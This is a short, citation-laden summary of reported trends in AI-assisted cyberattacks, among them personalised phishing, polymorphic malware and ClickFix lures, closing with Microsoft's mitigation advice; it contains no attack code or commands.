Attackers using AI tactics

Microsoft’s 2025 Digital Defense Report measured AI‑generated phishing at a 54% click‑through rate versus 12% for non‑AI phishing (4.5× more effective) across Microsoft’s July 2024–June 2025 telemetry. (microsoft.com)) Automated reconnaissance tools and LLMs are being used to scrape public social profiles and generate highly personalized lures that reference real projects, colleagues, or calendar events, according to Microsoft and contemporary reporting. (microsoft.com)) Proof‑of‑concepts and vendor walk‑throughs show LLMs can produce polymorphic malware that rewrites or obfuscates its own code at build time or runtime, creating unique binaries for each victim and complicating signature matching. (cardinalops.com)) Industry analysis and peer‑reviewed research note that legacy signature‑based antivirus and static gateway filters are failing to catch a growing slice of these adaptive threats and recommend behavioral/runtime detection as a necessary complement. (csoonline.com)) ClickFix-style social‑engineering—landing pages that coerce victims into copying and running commands—exploded in 2025, with ESET telemetry reporting a ~517% rise and nearly 8% of blocked attacks in H1 2025, and Microsoft identifying ClickFix as the leading initial‑access technique in its 2025 analysis (about 47% of observed initial access cases). (web-assets.esetstatic.com)) Microsoft’s guidance for mitigating these AI‑augmented campaigns includes hardening device configurations (for example, restricting the Run dialog and limiting script execution), expanding MFA coverage, and applying Zero‑Trust principles while using AI‑powered detection and automated remediation where feasible. (microsoft.com))